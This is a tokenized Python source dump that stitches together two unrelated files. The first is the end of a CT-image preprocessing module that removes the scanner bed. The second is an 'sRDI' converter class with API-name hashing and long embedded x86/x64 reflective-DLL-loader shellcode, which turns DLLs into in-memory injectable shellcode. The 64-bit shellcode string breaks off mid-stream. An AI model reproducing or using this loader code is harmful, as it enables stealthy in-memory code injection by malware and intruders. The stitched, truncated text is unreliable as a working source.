"""<line_sep>fixed_min=fixed_image.image.min()<line_sep>moving_min=moving_image.image.min()<line_sep>min_val=min(fixed_min moving_min)<line_sep>fixed_image.image<augsub>min_val<line_sep>moving_image.image<augsub>min_val<line_sep>moving_max=moving_image.image.max()<line_sep>fixed_max=fixed_image.image.max()<line_sep>max_val=max(fixed_max moving_max)<line_sep>fixed_image.image<augdiv>max_val<line_sep>moving_image.image<augdiv>max_val<line_sep><return>(fixed_image moving_image)<block_end><def_stmt>remove_bed_filter image cropping=<true><block_start>"""
Removes fine structures from the image using morphological operators. It can be used to remove the bed structure
usually present in CT images. The resulting image and the respective body mask can be cropped with the cropping
option.
Note: the morphological operations are performed on a downsampled version of the image
image (Image): image of interest
cropping (bool): specifies if the image should be cropped after bed removal
return (Image, Image): bed-free image and a body mask
"""<line_sep># define parameters
houndsfield_min=-300<line_sep>houndsfield_max=3071<line_sep>houndsfield_default=-1024<line_sep>radius_opening=3<line_sep>radius_closing=40<line_sep>image_itk=image.itk()<line_sep># resample image
workingSize=np.array(image.size)<line_sep>workingSize[0]<augdiv>3<line_sep>workingSize[1]<augdiv>3<line_sep>workingSpacing=np.array(image.spacing dtype=float)<times>np.array(image.size dtype=float)/np.array(workingSize dtype=float)<line_sep>resampler=sitk.ResampleImageFilter()<line_sep>resampler.SetOutputOrigin(image.origin)<line_sep>resampler.SetSize(workingSize.tolist())<line_sep>resampler.SetOutputSpacing(workingSpacing.tolist())<line_sep>resampler.SetInterpolator(2)# linear interpolation
resampler.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=resampler.Execute(image_itk)<line_sep># threshold image
thresholder=sitk.BinaryThresholdImageFilter()<line_sep>thresholder.SetOutsideValue(0)<line_sep>thresholder.SetInsideValue(1)<line_sep>thresholder.SetLowerThreshold(houndsfield_min)<line_sep>thresholder.SetUpperThreshold(houndsfield_max)<line_sep>thresholder.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=thresholder.Execute(image_tmp)<line_sep># morphological opening with ball as structuring element
# removes thin structures as the bed
opening=sitk.BinaryMorphologicalOpeningImageFilter()<line_sep>opening.SetKernelType(sitk.sitkBall)<line_sep>opening.SetKernelRadius(radius_opening)<line_sep>opening.SetForegroundValue(1)<line_sep>opening.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=opening.Execute(image_tmp)<line_sep># crop zero values from mask boundary
<if_stmt>cropping<block_start>image_tmp=auto_crop_image_filter(Image(image_tmp).to(device=image.device)).itk()<block_end># morphological closing with ball as structuring element
# fills up the lungs
closing=sitk.BinaryMorphologicalClosingImageFilter()<line_sep>closing.SetKernelRadius(sitk.sitkBall)<line_sep>closing.SetKernelRadius(radius_closing)<line_sep>closing.SetForegroundValue(1)<line_sep>closing.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=closing.Execute(image_tmp)<line_sep># resample mask to original spacing
mask_size=np.array(np.array(image_tmp.GetSpacing() dtype=float)<times>np.array(image_tmp.GetSize() dtype=float)/np.array(image.spacing dtype=float) dtype=int).tolist()<line_sep>resampler=sitk.ResampleImageFilter()<line_sep>resampler.SetOutputOrigin(image_tmp.GetOrigin())<line_sep>resampler.SetSize(mask_size)<line_sep>resampler.SetOutputSpacing(image.spacing)<line_sep>resampler.SetInterpolator(1)# nearest neighbor interpolation
resampler.SetNumberOfThreads(mp.cpu_count())<line_sep>bodyMask=resampler.Execute(image_tmp)<line_sep># resample also original image
resampler.SetInterpolator(2)<line_sep>image_itk=resampler.Execute(image_itk)<line_sep># mask image with found label map
masking=sitk.MaskImageFilter()<line_sep>masking.SetMaskingValue(0)<line_sep>masking.SetOutsideValue(houndsfield_default)<line_sep>masking.SetNumberOfThreads(mp.cpu_count())<line_sep>outImage=masking.Execute(image_itk bodyMask)<line_sep><return>(Image(outImage).to(device=image.device) Image(bodyMask).to(device=image.device))<block_end> |
<import_stmt>base64<import_stmt>struct<import_from_stmt>converters.Transformer Transformer<class_stmt>sRDI(Transformer)<block_start>MACHINE_IA64=512<line_sep>MACHINE_AMD64=34404<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.flags=0|0x1|0x4|30<lshift>16<line_sep>self.function="DllMain"<line_sep>self.args=b"test"<line_sep>self.filetype="dll"<block_end>@staticmethod<def_stmt>is64BitDLL _bytes<block_start>header_offset=struct.unpack("<L" _bytes[60:64])[0]<line_sep>machine=struct.unpack("<H" _bytes[header_offset+4:header_offset+4+2])[0]<if_stmt>machine<eq>sRDI.MACHINE_IA64<or>machine<eq>sRDI.MACHINE_AMD64<block_start><return><true><block_end><return><false><block_end>@staticmethod<def_stmt>ror val r_bits max_bits<block_start><return>((val&(2<power>max_bits-1))<rshift>r_bits%max_bits)|(val<lshift>(max_bits-(r_bits%max_bits))&(2<power>max_bits-1))<block_end>@staticmethod<def_stmt>HashFunctionName name module=<none><block_start>function=name.encode()+b'\x00'<if_stmt>module<block_start>module=module.upper().encode('UTF-16LE')+b'\x00\x00'<line_sep>function_hash=0<for_stmt>b function<block_start>function_hash=sRDI.ror(function_hash 13 32)<line_sep>function_hash<augadd>b<block_end>module_hash=0<for_stmt>b module<block_start>module_hash=sRDI.ror(module_hash 13 32)<line_sep>module_hash<augadd>b<block_end>function_hash<augadd>module_hash<if_stmt>function_hash<g>0xFFFFFFFF<block_start>function_hash<augsub>0x100000000<block_end><block_end><else_stmt><block_start>function_hash=0<for_stmt>b function<block_start>function_hash=sRDI.ror(function_hash 13 32)<line_sep>function_hash<augadd>b<block_end><block_end><return>function_hash<block_end>@staticmethod<def_stmt>ConvertToShellcode dll_bytes function_hash=0x10 user_data=b'None' flags=0# MARKER:S
<block_start>rdi_shellcode32=b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00'<concat>b'\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00'<concat>b'\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A'<concat>b'\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89'<concat>b'\xAC\x24\xB0\x00\x00\x00\x89\x6C\x24\x34\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xC4\x00'<concat>b'\x00\x00\x89\xAC\x24\xB4\x00\x00\x00\x89\xAC\x24\xAC\x00\x00\x00\x89\xAC\x24\xE0\x00\x00'<concat>b'\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2'<concat>b'\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94'<concat>b'\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6'<concat>b'\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7'<concat>b'\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24'<concat>b'\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44'<concat>b'\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C'<concat>b'\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E'<concat>b'\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88'<concat>b'\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00'<concat>b'\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C'<concat>b'\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00'<concat>b'\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59'<concat>b'\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24
'<concat>b'\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00'<concat>b'\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24'<concat>b'\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C'<concat>b'\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00'<concat>b'\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00'<concat>b'\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24'<concat>b'\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00'<concat>b'\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x77\x08\x00'<concat>b'\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x6B\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00'<concat>b'\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24'<concat>b'\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x34\x50\x55'<concat>b'\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x44\x24'<concat>b'\x34\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58'<concat>b'\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x5C\x89\x44\x24\x18\x8D\x84\x24\xB4'<concat>b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44'<concat>b'\x24\x14\x66\x89\x44\x24\x16\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x18\x8D\x84\x24\xB8'<concat>b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24'<concat>b'\x6C\x66\x89\x74\x24\x14\x89\x44\x24\x18\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24'<concat>b'\x1C\x66\x89\x74\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x14\x66'<concat>b'\x89\x44\x24\x16\x8D\x44\x24\x3C\x89\x44\x24\x18\x8D\x84\x24\xAC\x00\x00\x00\x50\x55\x8D'<concat>b'\x44\x24\
x1C\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x14'<concat>b'\x89\x44\x24\x18\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x74\x24\x1E'<concat>b'\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x84'<concat>b'\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF'<concat>b'\xD3\x39\x6C\x24\x34\x0F\x84\x00\x07\x00\x00\x39\xAC\x24\xB4\x00\x00\x00\x0F\x84\xF3\x06'<concat>b'\x00\x00\x39\xAC\x24\xAC\x00\x00\x00\x0F\x84\xE6\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00'<concat>b'\x0F\x84\xD9\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\xCA\x06\x00\x00\x8B'<concat>b'\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\xB2\x06\x00'<concat>b'\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\xA3\x06\x00\x00\xF6\x46\x38\x01\x0F\x85'<concat>b'\x99\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x1E\x03'<concat>b'\xCE\x83\x79\x04\x00\x8B\x46\x38\x0F\x45\x41\x04\x03\x01\x8D\x49\x28\x3B\xC3\x0F\x46\xC3'<concat>b'\x8B\xD8\x83\xEA\x01\x75\xE4\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01'<concat>b'\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2'<concat>b'\x3B\xE8\x0F\x85\x3D\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24'<concat>b'\x44\x8B\xD8\x89\x5C\x24\x2C\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54'<concat>b'\x24\x44\x8B\xD8\x89\x44\x24\x2C\xF6\x84\x24\x38\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89'<concat>b'\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88'<concat>b'\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3'<concat>b'\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24'<concat>b'\x10\x33\xC0\x89\x6C\x24\x28\x0F\xB7\x55\x14\x83\xC2\x28\x66\x3B\x45\x06\x73\x31\x03\xD5'<concat>b'\x33\xF6\x39\x32\x76\x19\x8B\
x42\x04\x8B\x4A\xFC\x03\xC6\x03\xCB\x8A\x04\x38\x88\x04\x31'<concat>b'\x46\x3B\x32\x72\xEB\x8B\x4C\x24\x10\x0F\xB7\x45\x06\x41\x83\xC2\x28\x89\x4C\x24\x10\x3B'<concat>b'\xC8\x72\xD1\x8B\xC3\xC7\x84\x24\xBC\x00\x00\x00\x01\x00\x00\x00\x2B\x45\x34\x89\x44\x24'<concat>b'\x24\x0F\x84\xC4\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xB7\x00\x00\x00\x8B\xB5'<concat>b'\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\xA6\x00\x00\x00\x6A\x02\x8B\xF8\x5D\x8D\x56'<concat>b'\x08\xEB\x75\x0F\xB7\x02\x89\x44\x24\x10\x0F\xB7\xC8\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75'<concat>b'\x28\x8B\x16\x8B\x4C\x24\x10\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x10\x8D\x04\x1A\x8B\x0C'<concat>b'\x08\x8D\x04\x1A\x8B\x54\x24\x10\x03\xCF\x89\x0C\x10\x8B\x54\x24\x24\xEB\x37\x66\x83\xF8'<concat>b'\x03\x75\x0D\x81\xE1\xFF\x0F\x00\x00\x03\x0E\x01\x3C\x19\xEB\x24\x66\x3B\x84\x24\xBC\x00'<concat>b'\x00\x00\x75\x07\x8B\xC7\xC1\xE8\x10\xEB\x08\x66\x3B\xC5\x75\x0E\x0F\xB7\xC7\x81\xE1\xFF'<concat>b'\x0F\x00\x00\x03\x0E\x01\x04\x19\x03\xD5\x8B\x46\x04\x03\xC6\x89\x54\x24\x24\x3B\xD0\x0F'<concat>b'\x85\x7A\xFF\xFF\xFF\x83\x3A\x00\x8B\xF2\x0F\x85\x6A\xFF\xFF\xFF\x8B\x6C\x24\x28\x8B\xBC'<concat>b'\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xD7\x01\x00\x00\x8B\xB5\x80\x00'<concat>b'\x00\x00\x33\xC0\x89\x44\x24\x10\x8D\x0C\x1E\x89\x4C\x24\x24\x83\xC1\x0C\x39\x01\x74\x0D'<concat>b'\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x44\x24\x10\x8B\x8C\x24\x38\x01\x00\x00\x8B\xD1'<concat>b'\x83\xE2\x04\x89\x54\x24\x38\x8B\xD6\x0F\x84\xC3\x00\x00\x00\x83\xF8\x01\x0F\x86\xBA\x00'<concat>b'\x00\x00\x83\xA4\x24\xBC\x00\x00\x00\x00\xC1\xE9\x10\x89\x8C\x24\x38\x01\x00\x00\x8D\x48'<concat>b'\xFF\x89\x8C\x24\xC0\x00\x00\x00\x85\xC9\x0F\x84\xA1\x00\x00\x00\x8B\x74\x24\x24\x8B\xDE'<concat>b'\x8B\xAC\x24\xBC\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F'<concat>b'\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D'<concat>b'\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\
x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59'<concat>b'\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x44\x24'<concat>b'\x10\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01'<concat>b'\x00\x00\x83\xC3\x14\x8B\x74\x24\x24\x3B\xAC\x24\xC0\x00\x00\x00\x72\x87\x8B\x6C\x24\x28'<concat>b'\x8B\x5C\x24\x2C\x8B\x95\x80\x00\x00\x00\xEB\x0B\x8B\x44\x24\x38\x89\x84\x24\x38\x01\x00'<concat>b'\x00\x8D\x3C\x1A\x8B\x47\x0C\x89\x7C\x24\x2C\x85\xC0\x0F\x84\xB8\x00\x00\x00\x03\xC3\x50'<concat>b'\xFF\x94\x24\xB4\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB'<concat>b'\x8B\x0E\x85\xC9\x74\x60\x8B\x7C\x24\x30\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB'<concat>b'\x36\x83\xC1\x02\x33\xC0\x03\xCB\x89\x8C\x24\xC0\x00\x00\x00\x38\x01\x74\x0E\x40\x41\x80'<concat>b'\x39\x00\x75\xF9\x8B\x8C\x24\xC0\x00\x00\x00\x55\x66\x89\x44\x24\x18\x66\x89\x44\x24\x1A'<concat>b'\x8D\x44\x24\x18\x6A\x00\x89\x4C\x24\x20\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E'<concat>b'\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xA8\x8B\x7C\x24\x2C\x83\x7C\x24\x38\x00\x74\x1C\x33'<concat>b'\xC0\x40\x39\x44\x24\x10\x76\x13\x69\x84\x24\x38\x01\x00\x00\xE8\x03\x00\x00\x50\xFF\x94'<concat>b'\x24\xB0\x00\x00\x00\x8B\x47\x20\x83\xC7\x14\x89\x7C\x24\x2C\x85\xC0\x0F\x85\x4C\xFF\xFF'<concat>b'\xFF\x8B\x6C\x24\x28\x83\xBD\xE4\x00\x00\x00\x00\x0F\x84\xAD\x00\x00\x00\x8B\x85\xE0\x00'<concat>b'\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x10\x8B\x00\x85\xC0\x0F\x84\x94\x00\x00\x00\x8B'<concat>b'\x6C\x24\x10\x03\xC3\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08'<concat>b'\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x30\x8B\x17\x85\xD2\x79\x09'<concat>b'\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x38\x38\x02'<concat>b'\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x38\x56\x66\x89\x44\x24\x18\x66\x89\x44'<concat>b'\x24\x1A\x8D\x44\x24\x18\x6A\x00\x89\x54\x24\x20\x50\x51\xFF\xD5\x83\
xC6\x04\x83\xC7\x04'<concat>b'\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x10\x83\xC5\x20\x89\x6C\x24\x10'<concat>b'\x8B\x45\x00\x85\xC0\x0F\x85\x74\xFF\xFF\xFF\x8B\x6C\x24\x28\x0F\xB7\x75\x14\x33\xC0\x83'<concat>b'\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\xE5\x00\x00\x00\x03\xF5\xBA\x00\x00\x00\x40\x83'<concat>b'\x3E\x00\x0F\x84\xC5\x00\x00\x00\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x20\x75\x0B\x85\xCA'<concat>b'\x75\x07\x85\xC9\x78\x03\x40\xEB\x62\x85\xC0\x75\x30\x85\xCA\x75\x08\x85\xC9\x79\x04\x6A'<concat>b'\x08\xEB\x51\x85\xC0\x75\x20\x85\xCA\x74\x08\x85\xC9\x78\x04\x6A\x02\xEB\x41\x85\xC0\x75'<concat>b'\x10\x85\xCA\x74\x08\x85\xC9\x79\x04\x6A\x04\xEB\x31\x85\xC0\x74\x4A\x85\xCA\x75\x08\x85'<concat>b'\xC9\x78\x04\x6A\x10\xEB\x21\x85\xC0\x74\x3A\x85\xCA\x75\x0B\x85\xC9\x79\x07\xB8\x80\x00'<concat>b'\x00\x00\xEB\x0F\x85\xC0\x74\x27\x85\xCA\x74\x0D\x85\xC9\x78\x09\x6A\x20\x58\x89\x44\x24'<concat>b'\x20\xEB\x1A\x85\xC0\x74\x12\x85\xCA\x74\x0E\x8B\x44\x24\x20\x85\xC9\x6A\x40\x5A\x0F\x48'<concat>b'\xC2\xEB\xE4\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89'<concat>b'\x44\x24\x20\x8D\x4C\x24\x20\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC4\x00'<concat>b'\x00\x00\xBA\x00\x00\x00\x40\x0F\xB7\x45\x06\x47\x83\xC6\x28\x3B\xF8\x0F\x82\x22\xFF\xFF'<concat>b'\xFF\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC4\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74'<concat>b'\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00'<concat>b'\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x28\x33\xC0\x40\x50\x50'<concat>b'\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xAB\x00\x00\x00'<concat>b'\x83\x7D\x7C\x00\x0F\x84\xA1\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84'<concat>b'\x91\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x87\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB'<concat>b'\x83\x64\x24\x30\x00\x03\xCB\x85\xED\x74\x74\x8B\x37\xC7\x44\x24\x10\x00\x00\x00\x00\x03'
<concat>b'\xF3\x74\x66\x8A\x06\x84\xC0\x74\x1A\x8B\x6C\x24\x10\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46'<concat>b'\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x10\x8B\x6A\x18\x8B\x84\x24\x2C\x01\x00\x00\x3B\x44'<concat>b'\x24\x10\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x30\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24'<concat>b'\x30\x3B\xC5\x72\xAE\xEB\x20\x0F\xB7\x09\x8B\x42\x1C\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4'<concat>b'\x24\x34\x01\x00\x00\x8D\x04\x88\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33'<concat>b'\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53'<concat>b'\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33'<concat>b'\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89'<concat>b'\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C'<concat>b'\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83'<concat>b'\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24'<concat>b'\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B'<concat>b'\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8'<concat>b'\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20'<concat>b'\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E'<concat>b'\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B'<concat>b'\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB 
'<line_sep>rdi_shellcode64=b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41'<concat>b'\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF'<concat>b'\xC7\x45\xD8\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D'<concat>b'\xC8\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C'<concat>b'\x89\x7D\x00\x4C\x89\x7D\xF0\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x2C\xC7\x45'<concat>b'\xDC\x72\x00\x6E\x00\xC7\x45\xE0\x65\x00\x6C\x00\xC7\x45\xE4\x33\x00\x32\x00\xC7\x45\xE8'<concat>b'\x2E\x00\x64\x00\xC7\x45\xEC\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24'<concat>b'\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60'<concat>b'\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44'<concat>b'\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50'<concat>b'\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73'<concat>b'\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7'<concat>b'\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E